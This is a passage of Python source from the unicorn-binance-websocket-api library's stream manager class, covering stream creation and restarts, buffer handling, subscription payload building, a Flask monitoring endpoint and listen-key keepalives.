This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` always uses the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
"""
if output is False:
output = self.output_default
self.stream_threading_lock[stream_id] = {'full_lock': threading.Lock(),
'receives_statistic_last_second_lock': threading.Lock()}
self.stream_list[stream_id] = {'exchange': self.exchange,
'stream_id': copy.deepcopy(stream_id),
'recent_socket_id': None,
'channels': copy.deepcopy(channels),
'markets': copy.deepcopy(markets),
'stream_label': copy.deepcopy(stream_label),
'stream_buffer_name': copy.deepcopy(stream_buffer_name),
'stream_buffer_maxlen': copy.deepcopy(stream_buffer_maxlen),
'symbols': copy.deepcopy(symbols),
'output': copy.deepcopy(output),
'subscriptions': 0,
'payload': [],
'api_key': copy.deepcopy(api_key),
'api_secret': copy.deepcopy(api_secret),
'dex_user_address': copy.deepcopy(self.dex_user_address),
'ping_interval': copy.deepcopy(ping_interval),
'ping_timeout': copy.deepcopy(ping_timeout),
'close_timeout': copy.deepcopy(close_timeout),
'status': 'starting',
'start_time': time.time(),
'processed_receives_total': 0,
'receives_statistic_last_second': {'most_receives_per_second': 0, 'entries': {}},
'seconds_to_last_heartbeat': None,
'last_heartbeat': None,
'kill_request': None,
'stop_request': None,
'crash_request': None,
'seconds_since_has_stopped': None,
'has_stopped': False,
'reconnects': 0,
'logged_reconnects': [],
'processed_transmitted_total': 0,
'last_static_ping_listen_key': 0,
'listen_key': False,
'listen_key_cache_time': 30 * 60,
'last_received_data_record': None,
'processed_receives_statistic': {},
'transfer_rate_per_second': {'bytes': {}, 'speed': 0}}
logger.info("BinanceWebSocketApiManager._add_stream_to_stream_list(" +
str(stream_id) + ", " + str(channels) + ", " + str(markets) + ", " + str(stream_label) + ", "
+ str(stream_buffer_name) + ", " + str(stream_buffer_maxlen) + ", " + str(symbols) + ")")
def _create_stream_thread(self,
loop,
stream_id,
channels,
markets,
stream_buffer_name=False,
stream_buffer_maxlen=None,
restart=False):
"""
Companion function of `self.create_stream()` to create a thread for the socket and to manage the coroutine
:param loop: provide an asyncio event loop
:type loop: asyncio loop
:param stream_id: provide a stream_id (only needed for userData streams to acquire a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` always uses the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param restart: set to `True` if it's a restart!
:type restart: bool
:return:
"""
if self.is_stop_request(stream_id):
return False
if restart is False:
if stream_buffer_name is not False:
self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
try:
# Not resetting the stream_buffer during a restart:
if self.stream_buffers[stream_buffer_name]:
pass
except KeyError:
self.stream_buffers[stream_buffer_name] = deque(maxlen=stream_buffer_maxlen)
asyncio.set_event_loop(loop)
socket = BinanceWebSocketApiSocket(self, stream_id, channels, markets)
try:
loop.run_until_complete(socket.start_socket())
except RuntimeError as error_msg:
if "cannot schedule new futures after interpreter shutdown" in str(error_msg):
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError error_msg: - {str(error_msg)} - stopping and shutting down - read "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/131"
f" for further information!")
self.stop_manager_with_all_streams()
sys.exit(1)
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f"error: 7 - {str(error_msg)} - if this stream did not restart after this error, please "
f"create an issue: "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/new/choose")
loop.close()
finally:
self.process_stream_signals("DISCONNECT", stream_id)
loop.close()
def _frequent_checks(self):
"""
This method is started as a thread and performs the frequent checks
"""
frequent_checks_id = time.time()
cpu_usage_time = False
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logger.info("BinanceWebSocketApiManager._frequent_checks() new instance created with frequent_checks_id=" +
str(frequent_checks_id))
# threaded loop for min 1 check per second
while self.stop_manager_request is None and self.frequent_checks_list[frequent_checks_id]['stop_request'] \
is None:
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id]['last_heartbeat'] = time.time()
time.sleep(0.3)
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
next_to_last_timestamp = current_timestamp - 2
total_most_stream_receives_last_timestamp = 0
total_most_stream_receives_next_to_last_timestamp = 0
active_stream_list = self.get_active_stream_list()
# check CPU stats
cpu = self.get_process_usage_cpu()
if cpu >= 95:
time_of_waiting = 5
if cpu_usage_time is False:
cpu_usage_time = time.time()
elif (time.time() - cpu_usage_time) > time_of_waiting:
logger.warning(f"BinanceWebSocketApiManager._frequent_checks() - High CPU usage since "
f"{str(time_of_waiting)} seconds: {str(cpu)}")
cpu_usage_time = False
else:
cpu_usage_time = False
# count most_receives_per_second total last second
if active_stream_list:
for stream_id in active_stream_list:
# set the streams `most_receives_per_second` value
try:
if self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp] > \
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']:
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second'] = \
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_next_to_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][next_to_last_timestamp]
except KeyError:
pass
# delete list entries older than `keep_max_received_last_second_entries`
# receives_statistic_last_second
delete_index = []
if len(self.stream_list[stream_id]['receives_statistic_last_second']['entries']) > \
self.keep_max_received_last_second_entries:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
temp_entries = copy.deepcopy(self.stream_list[stream_id]['receives_statistic_last_second']['entries'])
for timestamp_key in temp_entries:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logger.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key=" + str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) + " keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
for timestamp_key in delete_index:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'].pop(timestamp_key,
None)
# transfer_rate_per_second
delete_index = []
if len(self.stream_list[stream_id]['transfer_rate_per_second']['bytes']) > \
self.keep_max_received_last_second_entries:
try:
temp_bytes = self.stream_list[stream_id]['transfer_rate_per_second']['bytes']
for timestamp_key in temp_bytes:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logger.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key="
+ str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
except RuntimeError as error_msg:
logger.info("BinanceWebSocketApiManager._frequent_checks() - "
"Catched RuntimeError: " + str(error_msg))
for timestamp_key in delete_index:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'].pop(timestamp_key, None)
# set most_receives_per_second
try:
if int(self.most_receives_per_second) < int(total_most_stream_receives_last_timestamp):
self.most_receives_per_second = int(total_most_stream_receives_last_timestamp)
except ValueError as error_msg:
logger.error("BinanceWebSocketApiManager._frequent_checks() self.most_receives_per_second"
"=" + str(self.most_receives_per_second) + " total_most_stream_receives_last_timestamp"
"=" + str(total_most_stream_receives_last_timestamp) + " total_most_stream_receives_next_"
"to_last_timestamp=" + str(total_most_stream_receives_next_to_last_timestamp) + " error_"
"msg=" + str(error_msg))
# check receiving_speed_peak
last_second_receiving_speed = self.get_current_receiving_speed_global()
try:
if last_second_receiving_speed > self.receiving_speed_peak['value']:
self.receiving_speed_peak['value'] = last_second_receiving_speed
self.receiving_speed_peak['timestamp'] = time.time()
logger.info(f"BinanceWebSocketApiManager._frequent_checks() - reached new "
f"`highest_receiving_speed` "
f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} at "
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])}")
except TypeError:
pass
# send keepalive for `!userData` streams every 30 minutes
if active_stream_list:
for stream_id in active_stream_list:
if isinstance(active_stream_list[stream_id]['markets'], str):
active_stream_list[stream_id]['markets'] = [active_stream_list[stream_id]['markets'], ]
if isinstance(active_stream_list[stream_id]['channels'], str):
active_stream_list[stream_id]['channels'] = [active_stream_list[stream_id]['channels'], ]
if "!userData" in active_stream_list[stream_id]['markets'] or \
"!userData" in active_stream_list[stream_id]['channels']:
if (active_stream_list[stream_id]['start_time'] + active_stream_list[stream_id]['listen_key_cache_time']) \
< time.time() and (active_stream_list[stream_id]['last_static_ping_listen_key'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time():
# keep-alive the listenKey
self.restclient.keepalive_listen_key(stream_id)
# set last_static_ping_listen_key
self.stream_list[stream_id]['last_static_ping_listen_key'] = time.time()
self.set_heartbeat(stream_id)
logger.info("BinanceWebSocketApiManager._frequent_checks() - sent listen_key keepalive "
"ping for stream_id=" + str(stream_id))
sys.exit(0)
def _keepalive_streams(self):
"""
This method is started as a thread and observes the streams; if necessary, it restarts dead streams
"""
keepalive_streams_id = time.time()
self.keepalive_streams_list[keepalive_streams_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logger.info(
"BinanceWebSocketApiManager._keepalive_streams() new instance created with keepalive_streams_id=" +
str(keepalive_streams_id))
# threaded loop to restart crashed streams:
while self.stop_manager_request is None and \
self.keepalive_streams_list[keepalive_streams_id]['stop_request'] is None:
time.sleep(1)
self.keepalive_streams_list[keepalive_streams_id]['last_heartbeat'] = time.time()
# restart streams with a restart_request (status == new)
temp_restart_requests = copy.deepcopy(self.restart_requests)
for stream_id in temp_restart_requests:
try:
# find restarts that didn't work
if self.restart_requests[stream_id]['status'] == "restarted" and \
self.restart_requests[stream_id]['last_restart_time']+self.restart_timeout < time.time():
self.restart_requests[stream_id]['status'] = "new"
# restart streams with requests
if self.restart_requests[stream_id]['status'] == "new" or \
self.stream_list[stream_id]['kill_request'] is True:
self.kill_stream(stream_id)
thread = threading.Thread(target=self._restart_stream_thread, args=(stream_id,))
thread.start()
except KeyError:
pass
sys.exit(0)
def _restart_stream(self, stream_id):
"""
This is NOT stop/start! Its purpose is to start a dead stream again! Use `set_restart_request()` for stop/start!
:param stream_id: id of a stream
:type stream_id: uuid
:return: stream_id or False
"""
try:
if self.restart_requests[stream_id]['status'] != "new":
logger.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request()` "
"instead!")
return False
except KeyError:
# no restart_request entry for this stream_id:
logger.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request() instead!")
return False
logger.info("BinanceWebSocketApiManager._restart_stream(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + ")")
self.restart_requests[stream_id] = {'status': "restarted"}
self.restart_requests[stream_id]['last_restart_time'] = time.time()
self.stream_list[stream_id]['status'] = "restarting"
self.stream_list[stream_id]['kill_request'] = None
self.stream_list[stream_id]['payload'] = []
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.create_stream({str(stream_id)}) - OSError - "
f"error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
self.stream_list[stream_id]['channels'],
self.stream_list[stream_id]['markets'],
self.stream_list[stream_id]['stream_buffer_name'],
self.stream_list[stream_id]['stream_buffer_maxlen'],
True))
thread.start()
return stream_id
def _restart_stream_thread(self, stream_id):
"""
Wait until the old socket has closed, then start the stream again
:param stream_id: id of a stream
:type stream_id: uuid
"""
self._restart_stream(stream_id)
def _start_monitoring_api_thread(self, host, port, warn_on_update):
"""
Threaded method that serves the monitoring API
:param host: IP or hostname to use
:type host: str
:param port: Port to use
:type port: int
:param warn_on_update: Should the monitoring system report available updates?
:type warn_on_update: bool
"""
logger.info("BinanceWebSocketApiManager._start_monitoring_api_thread() - Starting monitoring API service ...")
app = Flask(__name__)
@app.route('/')
@app.route('/status/')
def redirect_to_wiki():
logger.info("BinanceWebSocketApiManager._start_monitoring_api_thread() 200 - "
"Visit https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-"
"Monitoring-API-Service for further information!")
return redirect("https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/"
"UNICORN-Monitoring-API-Service", code=302)
api = Api(app)
api.add_resource(BinanceWebSocketApiRestServer,
"/status/<string:statusformat>/",
"/status/<string:statusformat>/<string:checkcommandversion>",
resource_class_kwargs={'handler_binance_websocket_api_manager': self,
'warn_on_update': warn_on_update})
try:
dispatcher = wsgi.PathInfoDispatcher({'/': app})
self.monitoring_api_server = wsgi.WSGIServer((host, port), dispatcher)
self.monitoring_api_server.start()
except RuntimeError as error_msg:
logger.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
except OSError as error_msg:
logger.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
def add_to_ringbuffer_error(self, error):
"""
Add received error messages from websocket endpoints to the error ringbuffer
:param error: The data to add.
:type error: string
:return: bool
"""
while len(self.ringbuffer_error) >= self.get_ringbuffer_error_max_size():
self.ringbuffer_error.pop(0)
self.ringbuffer_error.append(str(error))
return True
def add_to_ringbuffer_result(self, result):
"""
Add received result messages from websocket endpoints to the result ringbuffer
:param result: The data to add.
:type result: string
:return: bool
"""
while len(self.ringbuffer_result) >= self.get_ringbuffer_result_max_size():
self.ringbuffer_result.pop(0)
self.ringbuffer_result.append(str(result))
return True
def add_to_stream_buffer(self, stream_data, stream_buffer_name=False):
"""
Kick back data to the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If it is not possible to process received stream data (for example, the database is restarting and the data
can not be saved), you can write the data back into the stream_buffer. A few seconds after you stop writing
data back to the stream_buffer, the BinanceWebSocketApiManager flushes the data back to normal
processing.
:param stream_data: the data you want to write back to the buffer
:type stream_data: raw stream_data or unicorn_fied stream data
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
with self.stream_buffer_lock:
self.stream_buffer.append(stream_data)
else:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].append(stream_data)
self.last_entry_added_to_stream_buffer = time.time()
return True
def add_to_stream_signal_buffer(self, signal_type=False, stream_id=False, data_record=False):
"""
Add signals about a stream to the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
:param signal_type: "CONNECT", "DISCONNECT" or "FIRST_RECEIVED_DATA"
:type signal_type: str
:param stream_id: id of a stream
:type stream_id: uuid
:param data_record: The last or first received data record
:type data_record: str or dict
:return: bool
"""
if self.enable_stream_signal_buffer:
stream_signal = {'type': signal_type,
'stream_id': stream_id,
'timestamp': time.time()}
if signal_type == "CONNECT":
# nothing to add ...
pass
elif signal_type == "DISCONNECT":
try:
stream_signal['last_received_data_record'] = self.stream_list[stream_id]['last_received_data_record']
except KeyError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Cant determine last_received_data_record! - error_msg: {error_msg}")
stream_signal['last_received_data_record'] = None
elif signal_type == "FIRST_RECEIVED_DATA":
stream_signal['first_received_data_record'] = data_record
else:
logger.error(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Received invalid `signal_type`!")
return False
with self.stream_signal_buffer_lock:
self.stream_signal_buffer.append(stream_signal)
logger.info(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({stream_signal})")
return True
else:
return False
def add_total_received_bytes(self, size):
"""
Add received bytes to the total received bytes statistic
:param size: int value of added bytes
:type size: int
"""
with self.total_received_bytes_lock:
self.total_received_bytes += int(size)
def clear_stream_buffer(self, stream_buffer_name=False):
"""
Clear the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
try:
self.stream_buffer.clear()
return True
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].clear()
return True
except IndexError:
return False
except KeyError:
return False
def create_payload(self, stream_id, method, channels=False, markets=False):
"""
Create the payload for subscriptions
:param stream_id: provide a stream_id
:type stream_id: uuid
:param method: `SUBSCRIBE` or `UNSUBSCRIBE`
:type method: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:return: payload (list) or False
"""
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") started ...")
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
payload = []
if self.is_exchange_type("dex"):
if method == "subscribe" and channels is not False:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
symbols = []
if channel == "allMiniTickers" or \
channel == "allTickers" or \
channel == "blockheight":
add_payload["symbols"] = ["$all"]
payload.append(add_payload)
continue
if markets:
for market in markets:
if market == "allMiniTickers" or \
market == "allTickers" or \
market == "blockheight":
add_payload_from_market = {"method": method,
"topic": market,
"symbols": ["$all"]}
payload.append(add_payload_from_market)
continue
elif re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
else:
symbols.append(market)
try:
if self.stream_list[stream_id]["dex_user_address"] is not False:
add_payload["address"] = self.stream_list[stream_id]["dex_user_address"]
payload.append(add_payload)
except KeyError:
pass
if len(symbols) > 0:
add_payload["symbols"] = symbols
payload.append(add_payload)
elif method == "unsubscribe":
if markets:
add_payload = {"method": method}
for market in list(markets):  # iterate over a copy, `markets` may shrink below
if re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
markets.remove(market)
if len(markets) > 0:
add_payload["symbols"] = markets
payload.append(add_payload)
if channels:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
payload.append(add_payload)
else:
logger.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
elif self.is_exchange_type("cex"):
final_market = "@arr"
if markets:
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
if channels:
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
if method == "subscribe":
params = []
for channel in channels:
if "!" in channel:
params.append(channel + final_market)
continue
else:
for market in markets:
if "!" in market:
params.append(market + final_channel)
else:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
params = list(set(params))
payload = self.split_payload(params, "SUBSCRIBE")
elif method == "unsubscribe":
if markets:
params = []
try:
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel:
params.append(channel + final_market)
else:
for market in markets:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
except KeyError:
pass
if channels:
params = []
for market in self.stream_list[stream_id]['markets']:
if "!" in market:
params.append(market + final_channel)
else:
for channel in channels:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
else:
logger.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Payload: " + str(payload))
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") finished ...")
return payload
def create_stream(self,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=20,
ping_timeout=20,
close_timeout=10,
stream_buffer_maxlen=None):
"""
Create a websocket stream
If you provide 2 markets and 2 channels, then you are going to create 4 subscriptions (markets * channels).
Example:
channels = ['trade', 'kline_1']
markets = ['bnbbtc', 'ethbtc']
Finally: bnbbtc@trade, ethbtc@trade, bnbbtc@kline_1, ethbtc@kline_1
`There is a subscriptions limit per stream!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/Binance-websocket-endpoint-configuration-overview>`_
Create `!userData` streams as single streams, because they use a different endpoint and can not be combined
with other streams in a multiplexed stream!
Example CEX:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb")``
Isolated Margin:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb", symbols="ankrbtc")``
Example DEX:
``binance_websocket_api_manager.create_stream(['orders', 'transfers', 'accounts'], binance_dex_user_address)``
To create a multiplexed stream which includes also `!miniTicker@arr`, `!ticker@arr`, `!forceOrder@arr` or
`!bookTicker@arr` you just need to add `!bookTicker` to the channels list - don't add `arr` (cex) or `$all`
(dex) to the markets list.
Example:
``binance_websocket_api_manager.create_stream(['kline_5m', 'marketDepth', '!miniTicker'], ['bnbbtc'])``
But you have to add `arr` or `$all` if you want to start it as a single stream!
Example:
``binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])``
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label to identify the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globally overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of `BinanceWebSocketApiManager()`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` always uses the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:return: stream_id or 'False'
"""
# create a stream
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`channels` must be str, tuple, list or a set!")
return False
elif isinstance(markets, bool):
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`markets` must be str, tuple, list or a set!")
return False
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if output is False:
output = self.output_default
stream_id = uuid.uuid4()
markets_new = []
if stream_buffer_name is True:
stream_buffer_name = stream_id
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
markets_new.append(str(market).upper())
else:
markets_new.append(str(market))
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
logger.info("BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets_new) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") with stream_id="
+ str(stream_id))
self._add_stream_to_stream_list(stream_id,
channels,
markets_new,
stream_label,
stream_buffer_name,
symbols=symbols,
api_key=api_key,
api_secret=api_secret,
output=output,
ping_interval=ping_interval,
ping_timeout=ping_timeout,
close_timeout=close_timeout,
stream_buffer_maxlen=stream_buffer_maxlen)
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}), {stream_buffer_maxlen} "
f"with stream_id="
f"{str(stream_id)} - OSError - can not create stream - error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
thread = threading.Thread(target=self._create_stream_thread, args=(loop,
stream_id,
channels,
markets_new,
stream_buffer_name,
stream_buffer_maxlen,
False))
thread.start()
return stream_id
def create_websocket_uri(self, channels, markets, stream_id=False, api_key=False, api_secret=False, symbols=False):
"""
Create a websocket URI
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_id: provide a stream_id (only needed for userData streams to acquire a listenKey)
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `channels` must be str, tuple, list "
f"or a set!")
return False
elif isinstance(markets, bool):
logger.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `markets` must be str, tuple, list "
f"or a set!")
return False
payload = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if len(channels) == 1 and len(markets) == 1:
if "!userData" in channels or "!userData" in markets:
if stream_id is not False:
response = self.get_listen_key_from_restclient(stream_id, api_key, api_secret, symbols=symbols)
try:
if response['code'] == -1102 or \
response['code'] == -2008 or \
response['code'] == -2014 or \
response['code'] == -2015 or \
response['code'] == -11001:
# -1102 = Mandatory parameter 'symbol' was not sent, was empty/null, or malformed.
# -2008 = Invalid Api-Key ID
# -2014 = API-key format invalid
# -2015 = Invalid API-key, IP, or permissions for action
# -11001 = Isolated margin account does not exist.
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received known "
"error code from rest client: " + str(response))
return response
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received unknown "
"error code from rest client: " + str(response))
return response
except KeyError:
pass
